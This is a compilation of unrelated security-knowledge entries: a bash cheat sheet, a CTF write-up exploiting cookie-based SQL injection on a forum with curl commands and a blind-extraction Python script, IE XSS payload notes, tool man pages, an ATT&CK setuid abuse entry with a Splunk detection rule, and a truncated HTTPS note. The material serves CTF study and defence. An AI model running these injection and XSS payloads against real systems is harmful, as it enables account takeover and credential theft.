10 ]; do echo "$count" ((count++)) done ``` ### Forever ```bash while true; do # here is some code. done ``` ### Forever (shorthand) ```bash while :; do # here is some code. 
done ``` ### Reading lines ```bash cat file.txt | while read line; do echo $line done ``` Bash Functions --------- ### Defining functions ```bash myfunc() { echo "hello $1" } ``` ```bash # Same as above (alternate syntax) function myfunc() { echo "hello $1" } ``` ```bash myfunc "John" ``` ### Returning values ```bash myfunc() { local myresult='some value' echo $myresult } ``` ```bash result="$(myfunc)" ``` ### Raising errors ```bash myfunc() { return 1 } ``` ```bash if myfunc; then echo "success" else echo "failure" fi ``` Bash Options {.cols-2} ------- ### Options ```bash # Avoid overlay files # (echo "hi" > foo) set -o noclobber # Used to exit upon error # avoiding cascading errors set -o errexit # Unveils hidden failures set -o pipefail # Exposes unset variables set -o nounset ``` ### Glob options ```bash # Non-matching globs are removed # ('*.foo' => '') shopt -s nullglob # Non-matching globs throw errors shopt -s failglob # Case insensitive globs shopt -s nocaseglob # Wildcards match dotfiles # ("*.sh" => ".foo.sh") shopt -s dotglob # Allow ** for recursive matches # ('lib/**/*.rb' => 'lib/a/b/c.rb') shopt -s globstar ``` Bash History {.cols-2} ------- ### Commands | Command | Description | |-----------------------|-------------------------------------------| | `history` | Show history | | `sudo !!` | Run the previous command with sudo | | `shopt -s histverify` | Don't execute expanded result immediately | ### Expansions | Expression | Description | |--------------|------------------------------------------------------| | `!$` | Expand last parameter of most recent command | | `!*` | Expand all parameters of most recent command | | `!-n` | Expand `n`th most recent command | | `!n` | Expand `n`th command in history | | `!<command>` | Expand most recent invocation of command `<command>` | ### Operations | Code | Description | |----------------------|-----------------------------------------------------------------------| | `!!` | Execute last command again | | `!!:s/<FROM>/<TO>/` | Replace first occurrence of `<FROM>` to `<TO>` in most recent command | | `!!:gs/<FROM>/<TO>/` | Replace all occurrences of `<FROM>` to `<TO>` in most recent command | | `!$:t` | Expand only basename from last parameter of most recent command | | `!$:h` | Expand only directory from last parameter of most recent command | `!!` and `!$` can be replaced with any valid expansion. ### Slices | Code | Description | |----------|------------------------------------------------------------------------------------------| | `!!:n` | Expand only `n`th token from most recent command (command is `0`; first argument is `1`) | | `!^` | Expand first argument from most recent command | | `!$` | Expand last token from most recent command | | `!!:n-m` | Expand range of tokens from most recent command | | `!!:n-$` | Expand `n`th token to last from most recent command | `!!` can be replaced with any valid expansion i.e. `!cat`, `!-2`, `!42`, etc. 
Miscellaneous ------------- ### Numeric calculations ```bash $((a + 200)) # Add 200 to $a ``` ```bash $(($RANDOM%200)) # Random number 0..199 ``` ### Subshells ```bash (cd somedir; echo "I'm now in $PWD") pwd # still in first directory ``` ### Inspecting commands ```bash command -V cd #=> "cd is a function/alias/whatever" ``` ### Redirection {.row-span-2 .col-span-2} ```bash python hello.py > output.txt # stdout to (file) python hello.py >> output.txt # stdout to (file), append python hello.py 2> error.log # stderr to (file) python hello.py 2>&1 # stderr to stdout python hello.py 2>/dev/null # stderr to (null) python hello.py &>/dev/null # stdout and stderr to (null) ``` ```bash python hello.py < foo.txt # feed foo.txt to stdin for python ``` ### Source relative ```bash source "${0%/*}/../share/foo.sh" ``` ### Directory of script ```bash DIR="${0%/*}" ``` ### Case/switch ```bash case "$1" in start | up) vagrant up ;; *) echo "Usage: $0 {start|stop|ssh}" ;; esac ``` ### Trap errors {.col-span-2} ```bash trap 'echo Error at about $LINENO' ERR ``` or ```bash traperr() { echo "ERROR: ${BASH_SOURCE[1]} at about ${BASH_LINENO[0]}" } set -o errtrace trap traperr ERR ``` ### printf ```bash printf "Hello %s, I'm %s" Sven Olga #=> "Hello Sven, I'm Olga printf "1 + 1 = %d" 2 #=> "1 + 1 = 2" printf "Print a float: %f" 2 #=> "Print a float: 2.000000" ``` ### Getting options {.col-span-2} ```bash while [[ "$1" =~ ^- && ! "$1" == "--" ]]; do case $1 in -V | --version ) echo $version exit ;; -s | --string ) shift; string=$1 ;; -f | --flag ) flag=1 ;; esac; shift; done if [[ "$1" == '--' ]]; then shift; fi ``` ### Check for command's result {.col-span-2} ```bash if ping -c 1 google.com; then echo "It appears you have a working internet connection" fi ``` ### Special variables {.row-span-2} | Expression | Description | |------------|------------------------------| | `$?` | Exit status of last task | | `$!` | PID of last background task | | `$$` | PID of shell | | `$0` | Filename of the shell script | See [Special parameters](http://wiki.bash-hackers.org/syntax/shellvars#special_parameters_and_shell_variables). ### Grep check {.col-span-2} ```bash if grep -q 'foo' ~/.bash_history; then echo "You appear to have typed 'foo' in the past" fi ``` ### Backslash escapes {.row-span-2} - &nbsp; - \! - \" - \# - \& - \' - \( - \) - \, - \; - \< - \> - \[ - \| - \\ - \] - \^ - \{ - \} - \` - \$ - \* - \? {.cols-4 .marker-none} Escape these special characters with `\` ### Heredoc ```sh cat <<END hello world END ``` ### Go to previous directory ```bash pwd # /home/user/foo cd bar/ pwd # /home/user/foo/bar cd - pwd # /home/user/foo ``` ### Reading input ```bash echo -n "Proceed? 
[y/n]: " read ans echo $ans ``` ```bash read -n 1 ans # Just one character ``` ### Conditional execution ```bash git commit && git push git commit || echo "Commit failed" ``` ### Strict mode ```bash set -euo pipefail IFS=$'\n\t' ``` See: [Unofficial bash strict mode](http://redsymbol.net/articles/unofficial-bash-strict-mode/) ### Optional arguments ```bash args=("$@") args+=(foo) args+=(bar) echo "${args[@]}" ``` Put the arguments into an array and then append ## Also see {.cols-1} * [Devhints](https://devhints.io/bash) _(devhints.io)_ * [Bash-hackers wiki](http://wiki.bash-hackers.org/) _(bash-hackers.org)_ * [Shell vars](http://wiki.bash-hackers.org/syntax/shellvars) _(bash-hackers.org)_ * [Learn bash in y minutes](https://learnxinyminutes.com/docs/bash/) _(learnxinyminutes.com)_ * [Bash Guide](http://mywiki.wooledge.org/BashGuide) _(mywiki.wooledge.org)_ * [ShellCheck](https://www.shellcheck.net/) _(shellcheck.net)_ * [shell - Standard Shell](https://devmanual.gentoo.org/tools-reference/bash/index.html) _(devmanual.gentoo.org)_
sec-knowleage
# High School Project

Category: Web Exploitation

## Description

> Here's my high school project, an online forum. It's so good that people actually use it. You can join, too. Since I'm the admin, I can also post secret stuff that only I can read. How cool is that!

## Solution

Visiting the attached website, we arrive at a forum with many categories and posts. The first category is called "Secrets" and is described as the "Admin's secret place". In the "Secrets" category, there's a topic titled "Flag". However, if we try to view it, we get an error: "Only an admin can view this topic".

The forum allows users to sign up by selecting a username / password combination and entering their email. Later, they can sign in with their username and password.

Another feature that the forum has is the ability to view the implementation sources (implemented in PHP). This is available via a link at the bottom of each page: `<a href="?src">Source</a>`. It's possible to append `"?src"` to any public PHP file and view its sources (including files which are included from within other files).

We won't go over all the sources; let's just cover the logic related to signing up and logging in.

In `signup.php`, after verifying various things about the username and password, we have:

```php
$sql = "INSERT INTO users(user_name, user_pass, user_email ,user_date, user_level) VALUES('" .
       mysqli_real_escape_string($conn, $_POST['user_name']) . "', '" .
       sha1($_POST['user_pass']) . "', '" .
       mysqli_real_escape_string($conn, $_POST['user_email']) . "', NOW(), 0)";

$result = mysqli_query($conn ,$sql);
if(!$result)
{
    //something went wrong, display the error
    echo 'Something went wrong while registering. Please try again later.';
    echo mysqli_error($conn); //debugging purposes, uncomment when needed
}
else
{
    echo 'Successfully registered. You can now <a href="signin.php">sign in</a> and start posting! :-)';
}
```

The main point here is that the password is saved as a SHA1 hash in the database.

In `signin.php`, after performing basic checks for the username and password, the application performs the following:

```php
//the form has been posted without errors, so save it
//notice the use of mysql_real_escape_string, keep everything safe!
//also notice the sha1 function which hashes the password
$sql = "SELECT user_id, user_name, user_pass, user_level FROM users WHERE user_name = '" .
       mysqli_real_escape_string($conn, $_POST['user_name']) . "' AND user_pass = '" .
       sha1($_POST['user_pass']) . "'";

$result = mysqli_query($conn, $sql);
if(!$result)
{
    //something went wrong, display the error
    echo 'Something went wrong while signing in. Please try again later.';
    //echo mysql_error(); //debugging purposes, uncomment when needed
}
else
{
    //the query was successfully executed, there are 2 possibilities
    //1. the query returned data, the user can be signed in
    //2. the query returned an empty result set, the credentials were wrong
    if(mysqli_num_rows($result) == 0)
    {
        echo 'You have supplied a wrong user/password combination. Please try again.';
    }
    else
    {
        //we put the user_id, user_name and user_pass values in cookies, so we can use it at various pages
        while($row = mysqli_fetch_assoc($result))
        {
            setcookie('user_id', $row['user_id']);
            setcookie('user_name', $row['user_name']);
            setcookie('user_pass', $row['user_pass']);
            echo 'Welcome, ' . $row['user_name'] . '. <a href="index.php">Proceed to the forum overview</a>.';
        }
    }
}
```

It searches for a user with a matching username and password, and if found - saves the user ID, username and hash of the password to a cookie. Later, when accessing any page, `header.php` decides if the user is logged in by comparing the cookies to the DB:

```php
$user = null;
if(isset($_COOKIE['user_id'], $_COOKIE['user_name'], $_COOKIE['user_pass']))
{
    $sql = "SELECT user_id, user_name, user_level FROM users WHERE user_id = " .
           mysqli_real_escape_string($conn, $_COOKIE['user_id']) . " AND user_name = '" .
           mysqli_real_escape_string($conn, $_COOKIE['user_name']) . "' AND user_pass = '" .
           mysqli_real_escape_string($conn, $_COOKIE['user_pass']) . "'";

    $result = mysqli_query($conn, $sql);
    if($result)
    {
        //we also put the user_id and user_name values in the $user, so we can use it at various pages
        while($row = mysqli_fetch_assoc($result))
        {
            $user = array();
            $user['user_id'] = $row['user_id'];
            $user['user_name'] = $row['user_name'];
            $user['user_level'] = $row['user_level'];
        }
    }
}

if($user)
{
    echo 'Hello ' . $user['user_name'] . '! Not you? <a href="signout.php">Sign out</a>';
}
else
{
    echo '<a href="signin.php">Sign in</a> or <a href="signup.php">create an account</a>.';
}
```

We can see that all DB access is sanitized using `mysqli_real_escape_string` (or `sha1`), and yet an injection is still possible! The faulty code is:

```sql
SELECT user_id, user_name, user_level FROM users WHERE user_id = " . mysqli_real_escape_string($conn, $_COOKIE['user_id']) . " AND user_name = '" . mysqli_real_escape_string($conn, $_COOKIE['user_name']) . "' AND user_pass = '" . mysqli_real_escape_string($conn, $_COOKIE['user_pass']) . "'";
```

Notice how the user id (which is expected to be an integer) is not surrounded by quotes. `mysqli_real_escape_string` just sanitizes `NUL (ASCII 0), \n, \r, \, ', ", Control-Z`, meaning we can enter anything else and refactor the SQL query without being detected.

The first thing that came to mind was to comment out the rest of the query by setting the `user_id` cookie value to `"100 --"`. This should produce the following query:

```sql
SELECT user_id, user_name, user_level FROM users WHERE user_id = 100 -- AND user_name = 'my_user' AND user_pass = 'my_pass'";
```

However, this didn't work, and other comment styles didn't affect the query either.

Another strategy would be to rewrite the query by taking advantage of MySQL's operator precedence and OR short-circuit evaluation. MySQL evaluates OR operators after finishing evaluating AND operators. So a query such as `SELECT true OR false AND false;` would return `true` since first the engine evaluates `false AND false` to `false` and then `true or false` to `true`.

In our example, this would map to setting the `user_id` cookie to `"100 or user_id = 9999"`, creating a query of:

```sql
SELECT user_id, user_name, user_level FROM users WHERE user_id = 100 or user_id = 9999 AND user_name = 'my_user' AND user_pass = 'my_pass'";
```

Such a query should return the user entry for the user with ID `100` regardless of the password. Let's try it:

```console
root@kali:/media/sf_CTFs/technion/High_School_Project# curl 'http://ctf.cs.technion.ac.il:4010/' -H "Cookie: user_id=100 or user_id = 9999 ; user_name=a; user_pass=a" -s | grep "Sign out"
Hello 5845653! Not you? <a href="signout.php">Sign out</a> </div>
```

We can see that the forum has identified us as the user with username `5845653` even without entering a password.

The next thing we'd like to do is search for the admin account:

```console
root@kali:/media/sf_CTFs/technion/High_School_Project# for i in {0..10}; do echo $i; curl 'http://ctf.cs.technion.ac.il:4010/' -H "Cookie: user_id=$i or user_id = 9999 ; user_name=a; user_pass=a" -s | grep "Sign out" && echo; done
0
1
2
3
4
Hello admin! Not you? <a href="signout.php">Sign out</a> </div>

5
6
Hello admin1! Not you? <a href="signout.php">Sign out</a> </div>

7
8
Hello admin2! Not you? <a href="signout.php">Sign out</a> </div>

9
Hello DuckyDebugDuck! Not you? <a href="signout.php">Sign out</a> </div>

10
Hello hey! Not you? <a href="signout.php">Sign out</a> </div>
```

We can see that the administrator has received user ID #4. We should now be able to visit the forum under his user and read his secrets.

```console
root@kali:/media/sf_CTFs/technion/High_School_Project# curl 'http://ctf.cs.technion.ac.il:4010/topic.php?id=1' -H "Cookie: user_id=4 or user_id = 9999 ; user_name=a; user_pass=a" -s | head -n 35
<!doctype html>
<html>
    <head>
        <title>Online Forum Project DSW</title>
        <link rel="stylesheet" href="style.css">
        <link rel="shortcut icon" href="favicon.ico">
    </head>
    <body>
        <h1> Online Forum</h1>
        <div id="wrapper">
        <div id="menu">
            <a class="item" href="index.php"> Home </a>
            <a class="item" href="create_topic.php"> Create a topic</a>
            <a class="item" href="create_cat.php"> Create a category</a>
        </div>
        <div id="userbar">
            <div id="userbar">
                Hello admin! Not you? <a href="signout.php">Sign out</a> </div>
        </div>
        <div id="content">
            <h2>Posts in Flag topic</h2><table border="1"> <tr> <th>Post</th> <th>Date and user name</th> </tr><tr><td class="leftpart">import hashlib<br> password = input('Insert admin password: ')<br> x1 = hashlib.sha1(password.encode()).hexdigest()<br> x2 = hashlib.sha1(x1.encode()).hexdigest()[:10]<br> print('The flag is: cstechnion{A1m0$7_$3cUR3_' + x2 + '}')</td><td class="rightpart">23-11-2020<br>admin</td></tr><tr><td class="leftpart">a</td><td class="rightpart">23-11-2020<br>y</td></tr><tr><td class="leftpart">test2</td><td class="rightpart">23-11-2020<br>revivo</td></tr><tr><td class="leftpart"></td><td class="rightpart">23-11-2020<br>user</td></tr><tr><td class="leftpart">yo send me the flag :(</td><td class="rightpart">23-11-2020<br>user</td></tr><tr><td class="leftpart">WOOHOOO</td><td class="rightpart">24-11-2020<br>matan4</td></tr><tr><td class="leftpart"></td><td class="rightpart">24-11-2020<br>admin3</td></tr><tr><td class="leftpart"></td><td class="rightpart">24-11-2020<br>admin3</td></tr><tr><td class="leftpart">asdasdaxzczc</td><td class="rightpart">24-11-2020<br>asdqwezxc</td></tr><tr><td class="leftpart">asdasdaxzczc</td><td class="rightpart">24-11-2020<br>asdqwezxc</td></tr><tr><td class="leftpart"></td><td class="rightpart">24-11-2020<br>asdqwezxc</td></tr><tr><td class="leftpart">flag?</td><td class="rightpart">24-11-2020<br>asdqwezxc</td></tr><tr><td class="leftpart">flag?</td><td class="rightpart">24-11-2020<br>asdqwezxc</td></tr><tr><td class="leftpart">flag?</td><td class="rightpart">24-11-2020<br>asdqwezxc</td></tr><tr><td class="leftpart">got the flag lol YEET</td><td class="rightpart">25-11-2020<br>admin</td></tr><tr><td class="leftpart">nice flag</td><td class="rightpart">26-11-2020<br>admin</td></tr><tr><td class="leftpart">Nice Flag!</td<br> class="rightpart">26-11-2020<br>admin</td></tr><tr><td class="leftpart">According to all known laws
```

Between a lot of fake messages written by (probably) other participants who were able to log in as admin, we see the following message:

```
password = input('Insert admin password: ')<br>
x1 = hashlib.sha1(password.encode()).hexdigest()<br>
x2 = hashlib.sha1(x1.encode()).hexdigest()[:10]<br>
print('The flag is: cstechnion{A1m0$7_$3cUR3_' + x2 + '}')
```

So, we need to somehow extract the admin's password. We can turn our SQL injection into a boolean-blind injection and brute-force the password (or the password's hash, to be exact) character after character. This means that for each character in the `user_pass` field, we craft a query so that the user will be logged in only if the query is true. Something like this:

```sql
SELECT user_id, user_name, user_level FROM users WHERE user_id = 4 and /*n-th character of user_pass is x*/ or user_id = 9999 AND user_name = 'my_user' AND user_pass = 'my_pass'";
```

For each index in the `user_password` string, we can try all possible characters until we see the user being welcomed as logged in. That's when we know we found the correct character. Usually this is done by injecting a query such as `and substring(user_pass,/*index*/,1) = char(/*current_character*/)`. This should work but will require us to iterate over all possible characters for each index (in the worst case). It's not too bad in our case since we know that the field contains a hex string, so characters are limited to `[0-9a-f]`, but just for fun we'll use a slightly different method to recover each character in a constant number of queries: We'll just extract each character by performing 7 queries to identify each bit in the character (ASCII characters always have the eighth bit zeroed).

The code:

```python
from pwn import *
import requests

BITS_IN_BYTE = 8
PASSWORD_FIELD_LEN = 20*2 # SHA1 hash -> 20 bytes, each byte is printed as two characters
ADMIN_USER_ID = 4

def inject_query(query):
    cookies = {
        "user_id": query,
        "user_name": "name",
        "user_pass": "pass"
    }
    r = requests.get("http://ctf.cs.technion.ac.il:4010/", cookies=cookies)
    return 'Not you? <a href="signout.php">Sign out</a>' in r.text

def leak_user_pass_character(user_id, index):
    byte = 0
    for i in range(BITS_IN_BYTE):
        bit_mask = (1 << i)
        is_bit_set = inject_query(f"{user_id} and ord(substring(user_pass,{index+1},1))&{bit_mask}={bit_mask} or FALSE ")
        byte |= (is_bit_set << i)
    return chr(byte)

def leak_password(user_id):
    password = ""
    with log.progress(f'Leaking password field for user {user_id}') as p:
        for i in range(PASSWORD_FIELD_LEN):
            p.status(f"Processing index {i}, recovered '{password}' so far...")
            new_char = leak_user_pass_character(user_id, i)
            password += new_char
    return password

admin_pass = leak_password(ADMIN_USER_ID)
log.success(f"Admin password: {admin_pass}")
```

Output:

```console
root@kali:/media/sf_CTFs/technion/High_School_Project# python3 solve.py
[+] Leaking password field for user 4: Done
[+] Admin password: eef2c983660a888d1c23703ab1aef09f65d90edb
```

We can double check our result by trying to access a page using these values:

```console
root@kali:/media/sf_CTFs/technion/High_School_Project# curl 'http://ctf.cs.technion.ac.il:4010/topic.php?id=1' -H "Cookie: user_id=4; user_name=admin; user_pass=eef2c983660a888d1c23703ab1aef09f65d90edb" -s | grep "Sign out"
Hello admin! Not you? <a href="signout.php">Sign out</a> </div>
```

The last part is constructing the flag according to the instructions we got:

```python
>>> import hashlib
>>> x1 = "eef2c983660a888d1c23703ab1aef09f65d90edb"
>>> x2 = hashlib.sha1(x1.encode()).hexdigest()[:10]
>>> print('The flag is: cstechnion{A1m0$7_$3cUR3_' + x2 + '}')
The flag is: cstechnion{A1m0$7_$3cUR3_ee51f2a8c6}
```

Notice that we don't know the admin's password, but we do have the SHA1 of the password which is enough to get the flag.
sec-knowleage
# XSS with Relative Path Overwrite - IE 8/9 and lower

You need these 3 components

```
1) Stored XSS that allows CSS injection, e.g.: {}*{xss:expression(open(alert(1)))}
2) URL rewriting.
3) Relative addressing to the CSS style sheet: ../style.css
```

A little example

```html
http://url.example.com/index.php/[RELATIVE_URL_INSERTED_HERE]

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<link href="[RELATIVE_URL_INSERTED_HERE]/styles.css" rel="stylesheet" type="text/css" />
</head>
<body>
Stored XSS with CSS injection - Hello {}*{xss:expression(open(alert(1)))}
</body>
</html>
```

Explanation of the vulnerability

> The Meta element forces IE's document mode into IE7 compatible, which is required to execute expressions. Our persistent text {}*{xss:expression(open(alert(1)))} is included on the page, and in a realistic scenario it would be a profile page or maybe a shared status update which is viewable by other users. We use "open" to prevent client-side DoS with repeated executions of alert.

> A simple request of "rpo.php/" makes the relative style load the page itself as a style sheet. The actual request is "/labs/xss_horror_show/chapter7/rpo.php/styles.css" — the browser thinks there's another directory, but the actual request is being sent to the document, and that in essence is how an RPO attack works.

Demo 1 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo.php`

Demo 2 at `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo2.php/fakedirectory/fakedirectory2/fakedirectory3`

MultiBrowser : `http://challenge.hackvertor.co.uk/xss_horror_show/chapter7/rpo3.php`

From : `http://www.thespanner.co.uk/2014/03/21/rpo/`

## Mutated XSS for Browser IE8/IE9

```html
<listing id=x>&lt;img src=1 onerror=alert(1)&gt;</listing>
<script>alert(document.getElementById('x').innerHTML)</script>
```

IE will read and write (decode) HTML multiple times, and the attacker's XSS payload will mutate and execute.

## References

- [TODO](TODO)
sec-knowleage
unarj
===

Decompress archives created by the arj command.

## Description

The **unarj command** is used to decompress archives created with the arj command.

### Syntax

```shell
unarj(options)(parameters)
```

### Options

```shell
e: extract files from the .arj archive;
l: list the files contained in the archive;
t: test whether the archive is intact;
x: extract files, preserving the paths stored in the archive.
```

### Parameters

.arj archive: the .arj archive to be decompressed.
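### Examples

A few illustrative invocations; the archive name `demo.arj` is only a placeholder:

```shell
# List the contents of the archive
unarj l demo.arj

# Test archive integrity
unarj t demo.arj

# Extract into the current directory
unarj e demo.arj

# Extract, preserving the directory structure stored in the archive
unarj x demo.arj
```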
sec-knowleage
# A Brief Overview of How Android Apps Run

This part focuses mainly on the basic execution principles of Java-layer and native-layer code in Android.

Generally speaking, when an App starts, Android first creates the Application class (declared in the AndroidManifest.xml file), then begins executing the Main Activity, and from there runs further code according to the app's various logic paths.

Note: this part may have the following problems

- it is brief
- the understanding may be incomplete

If you find anything worth adding, you are welcome to contribute at any time. Naturally, this part will also keep being updated over time.
sec-knowleage
# Plaid CTF 2017 Team: nazywam, ppr, psrok1, c7f.m0d3, cr019283, shalom ## Table of contents * [Logarithms are hard (misc)](logarithms) * [Multicast (crypto)](multicast) * [BB-8 (crypto)](bb8) * [SHA-4 (web/crypto)](sha4) * [Pykemon (web)](pykemon)
sec-knowleage
## Catch Me if You Can (Forensics, 100points)

tl;dr concatenate even and odd data packets and read the flag from the table

Download [usb.pcap](usb.pcap), load it into wireshark. There is some data being sent (I don't know what is actually going on, you can tell me, I'd love to find out :). `Leftover Capture Data` holds the raw data we want; filter the packets and then export them in order.

There are 22 files, `file` and `du` commands are extremely helpful here:

![alt](scr1.png)

2 beginnings and 2 cut-offs, so we are now 99% sure that there are only 2 files being sent and maybe they are in order?

After noticing some intersecting texts and images that connect, for example, `1-3-5`, we try concatenating odd files and even files together. We're left with [even.ods](even.ods) and [odd.ods](odd.ods)

odd.ods has an interesting table in it:

![alt](scr2.png)

It looks like a lookup table, so now we have to find the second half of the message. After unpacking odd.ods we spot an interesting string in `content.xml`:

`g6d5g5f2b6g5d3e4d4b3c5b6k2j5j5g4l2`

If we now use it with the lookup table we get:

`ndh[wh3re1sw@lly]`

Bingo!

* Fun fact, the string is actually in the spreadsheet in the bottom right corner ;)
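For reproducibility, here is one way to re-extract the leftover data and split it into the two interleaved halves from the command line. This is a sketch: it assumes a tshark build that exposes the `usb.capdata` field (field naming and hex formatting vary between versions):

```shell
# Dump the Leftover Capture Data of every data packet, one hex blob per line
tshark -r usb.pcap -T fields -e usb.capdata | grep -v '^$' > blobs.txt

# Re-assemble the two interleaved transfers: odd-numbered blobs into one
# file, even-numbered ones into the other
awk 'NR % 2 == 1' blobs.txt | tr -d ':\n' | xxd -r -p > odd.ods
awk 'NR % 2 == 0' blobs.txt | tr -d ':\n' | xxd -r -p > even.ods
```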
sec-knowleage
# T1548-001 - Linux - Setuid and Setgid

## Description from ATT&CK

An attacker can abuse the setuid or setgid bits to perform a shell escape, or exploit a vulnerability in an application, in order to run code in a different user's context. On Linux or macOS, when the setuid or setgid bit is set on an application, the application runs with the privileges of the owning user or group, respectively. Normally an application runs in the current user's context, regardless of which user or group owns it. In some situations, however, a program needs to execute in an elevated context to work correctly, while the user running it does not need elevated privileges.

Any user can set the setuid or setgid flag on their own applications without creating an entry in the sudoers file (which must be done by root). These bits are shown as an "s" instead of an "x" when viewing the file's attributes with `ls -l`. The `chmod` program can set these bits either via bit masking, `chmod 4777 [file]`, or via shorthand naming, `chmod u+s [file]`.

An attacker can apply this mechanism to their own malware to make sure they will be able to execute in an elevated context in the future.

### Setuid and Setgid in detail

The file-permission mechanism is a hallmark of Linux. For newcomers to Linux, read (r), write (w), and execute (x) are the rather basic permissions. A file's permission string has ten positions, shown in groups. The first position is a group on its own and denotes the file type:

    -: regular file
    d: directory
    l: symbolic link
    b: block device
    c: character device
    p: pipe
    s: socket

Linux also has three rather special permissions: setuid, setgid, and the sticky bit.

setuid: makes a file run with the privileges of its owner during execution. The typical example is /usr/bin/passwd: when an ordinary user runs it, the process gains root privileges during execution and can therefore change the user's password.

setgid: this permission is only effective on directories. After it is set on a directory, any file created inside the directory gets the same group as the directory.

sticky bit: can be understood as an anti-deletion bit. Whether a user may delete a file mainly depends on whether the file's group grants that user write permission. Without write permission, none of the files under the directory can be deleted, and no new files can be added. If you want users to be able to add files but not delete them, set the sticky bit on the files. Once set, even a user with write permission on the directory cannot delete the file.

## Test cases

Manipulating these flags uses the same command as manipulating file permissions: chmod. There are two ways:

### Method 1

    chmod u+s xxx  # set the setuid bit (setuid only affects files)
    chmod g+s xxx  # set the setgid bit (setgid only affects directories)
    chmod o+t xxx  # set the sticky bit, for directories

### Method 2

Octal notation. Ordinary file permissions are expressed with three octal digits, e.g. 666, 777, 644. To set the special flags, prepend one more octal digit, e.g. 4666, 2777:

    chmod 4775 xxx  # set the setuid bit
    chmod 2775 xxx  # set the setgid bit
    chmod 1775 xxx  # set the sticky bit, for directories

Only the meaning of that leading octal digit is described here:

    0: no special permission
    1: sticky only
    2: SGID only
    3: SGID and sticky
    4: SUID only
    5: SUID and sticky
    6: SUID and SGID
    7: all three

After setting these flags you can inspect them with ls -l. If present, they are displayed in place of the corresponding execute flag. Where did the original execute flag x go? The system's convention is: if x was set in that position, the special flags are shown as lowercase letters (s, s, t); otherwise, as uppercase letters (S, S, T).

Note: in the UNIX family, file and directory permissions are controlled through the three ordinary permissions read, write, and execute, plus the three special permissions available for use, combined with the owner and group scopes. You can change the permissions of files and directories with the chmod command, in either symbolic or numeric notation. The permissions of a symbolic link cannot be changed; if you modify the permissions of a symlink, the change applies to the original file it links to. The permission scopes are:

    u: User, the owner of the file or directory.
    g: Group, the group the file or directory belongs to.
    o: Other, every user who is neither the owner nor a member of the owning group.
    a: All, i.e. all users: owner, group, and others.

The permission codes are:

    r: read permission, numeric code 4.
    w: write permission, numeric code 2.
    x: execute or traverse permission, numeric code 1.
    -: no permission, numeric code 0.
    s: special permission.

Function of the command: change the permissions of a file or directory.

## Detection logs

bash history

## Reproduction

### Method 1 /

    icbc@icbc:/hacker$ ls -l
    -rw-r--r-- 1 root root 0 7月 19 17:22 bas.txt
    icbc@icbc:/hacker$ sudo chmod u+s bas.txt
    icbc@icbc:/hacker$ ls -l
    -rwSr--r-- 1 root root 0 7月 19 17:22 bas.txt
    icbc@icbc:/hacker$ sudo chmod g+s bas.txt
    icbc@icbc:/hacker$ ls -l
    -rwSr-Sr-- 1 root root 0 7月 19 17:22 bas.txt

### Method 2 /

    icbc@icbc:/hacker$ ls -l
    -rwxr-xr-x 1 root root 0 8月 28 15:16 admin.txt
    icbc@icbc:/hacker$ sudo chmod 4777 admin.txt
    icbc@icbc:/hacker$ ls -l
    -rwsrwxrwx 1 root root 0 8月 28 15:16 admin.txt
    icbc@icbc:/hacker$ sudo chmod 2777 admin.txt
    icbc@icbc:/hacker$ ls -l
    -rwxrwsrwx 1 root root 0 8月 28 15:16 admin.txt

## Traces left behind

### Method 1 /

    icbc@icbc:/hacker$ history
    650 chmod u+s bas.txt
    651 sudo chmod u+s bas.txt
    652 ls -l
    653 sudo chmod g+s bas.txt

### Method 2 /

    icbc@icbc:/hacker$ history
    683 sudo chmod 4777 admin.txt
    684 ls -l
    685 sudo chmod 2777 admin.txt

## Detection rule / approach

Splunk detection rule: index=linux sourcetype=bash_history "chmod `4***`" OR "chmod `2***`" OR "chmod u+s" OR "chmod g+s" | table host,user_name,bash_command

## References

MITRE ATT&CK T1548-001 <https://attack.mitre.org/techniques/T1548/001/>

Linux special file permissions <https://www.cnblogs.com/patriot/p/7874725.html>

The chmod command in Linux explained <https://www.cnblogs.com/lianstyle/p/8571975.html>

chmod parameters under Linux explained <https://blog.csdn.net/taiyang1987912/article/details/41121131>
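As a quick hunting aide complementing the Splunk rule above, defenders can also enumerate the files that already carry these bits and diff that baseline over time; the `find` invocations below are standard:

```shell
# Files with the setuid bit set
find / -perm -4000 -type f 2>/dev/null

# Files with the setgid bit set
find / -perm -2000 -type f 2>/dev/null

# Either bit, with owner and mode shown for triage (GNU find)
find / -perm /6000 -type f -exec ls -l {} \; 2>/dev/null
```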
sec-knowleage
killall
===

Kill a group of processes by process name.

## Description

The **killall command** kills processes by process name, so a group of same-named processes can be killed with a single command. With the kill command we can kill a process by its PID, but to find the process to kill we first need ps combined with grep; killall merges those two steps into one, which makes it a very convenient command.

### Syntax

```shell
killall(options)(parameters)
```

### Options

```shell
-e: require an exact match for very long process names;
-I: ignore case differences in the process name;
-g: kill the process group the process belongs to;
-i: interactive mode, ask for confirmation before killing each process;
-l: print the list of all known signal names;
-q: do not print anything if no process was killed;
-r: interpret the process name as a regular expression;
-s: send the specified signal instead of the default "SIGTERM";
-u: kill only processes owned by the specified user.
```

### Parameters

Process name: the name of the processes to kill.

### Examples

```shell
# Kill all processes with the same name
killall vi

# Specify the signal to send to the processes
killall -9 vi

# Signal 0 sends nothing to the process; the return value tells whether the process exists: 0 (exists), 1 (does not exist)
killall -0 vi
echo $?
```
sec-knowleage
### HTTPS overview

`HTTPS = HTTP + SSL/TLS`. All traffic between the server and the client is encrypted with TLS, so the data captured on the wire is ciphertext.

- [Analyzing HTTPS with Wireshark](http://www.freebuf.com/articles/system/37900.html)

### An HTTPS example challenge

> Challenge: hack-dat-kiwi-ctf-2015: ssl-sniff-2

Opening the capture we find SSL-encrypted data. Importing the `server.key.insecure` file provided with the challenge decrypts it:

```xml
GET /key.html HTTP/1.1
Host: localhost

HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 14:16:24 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Fri, 20 Nov 2015 14:15:54 GMT
ETag: "1c-524f98378d4e1"
Accept-Ranges: bytes
Content-Length: 28
Content-Type: text/html

The key is 39u7v25n1jxkl123
```
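For reference, the same RSA-private-key decryption can be scripted with tshark instead of the Wireshark GUI. Treat this as a sketch: the preference name below (`ssl.keys_list`) belongs to older Wireshark builds, and newer versions configure RSA keys through the RSA keys table or a TLS key log instead:

```shell
# Older tshark: point the SSL dissector at the leaked RSA key
# (format: ip,port,protocol,keyfile) and dump the decrypted HTTP
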